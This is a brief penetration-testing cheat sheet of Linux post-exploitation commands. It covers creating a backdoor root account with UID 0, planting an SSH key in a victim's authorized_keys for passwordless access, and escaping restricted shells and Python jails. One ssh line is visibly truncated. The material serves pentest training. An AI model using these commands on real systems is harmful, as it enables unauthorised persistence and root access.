# Linux

## Introduction

In this section, you will find several useful commands for the Post-Exploitation phase in Linux systems.

## User

### Creating a user

```bash
sudo useradd [-m] <USERNAME>
```

### Add a user to a group

```bash
sudo usermod -aG <GROUP> <USERNAME>
```

### Create an alternative root user

```bash
useradd -m -ou 0 -g 0 -p <ENCRYPTED_PASSWORD> -s /bin/bash <USERNAME>
```

## Login through SSH

There are times when we have a remote terminal as a user but we want to have access as that user via SSH although **we do not know** their **password**. SSH keys are used for these cases.

1. Generate a SSH key pair.

```bash
kali@kali:~$ ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kali/.ssh/id_rsa
Your public key has been saved in /home/kali/.ssh/id_rsa.pub
[...]
```

1. Add the public key to the victim's file `~/.ssh/authorized_keys`:

```bash
echo -e "\n<PUB_KEY>\n" >> ~/.ssh/authorized_keys
```

1. Log in.

```bash
ssh -i ~/.ssh/id_rsa <USERNAME>@<IP>
```

## Shell Escapes

It could be the case that you have obtained access to a restricted shell allowing you to perform a minimal amount of commands and preventing you from accessing other directories or files.

In this section, you will find some ways to escape those restricted shells.

### SSH

```bash
ssh <USERNAME>@<TARGET_I -t "bash --noprofile -i"
```

### Python Jail

```bash
echo os.system('/bin/bash')
```

For more examples of how to escape restricted shells, read the following articles.

* [rbash escape | rbash restricted shell escape](https://www.hacknos.com/rbash-escape-rbash-restricted-shell-escape/)
* [Escaping Restricted Linux Shells](https://www.sans.org/blog/escaping-restricted-linux-shells/)
* [Escaping python jails](https://anee.me/escaping-python-jails-849c65cf306e)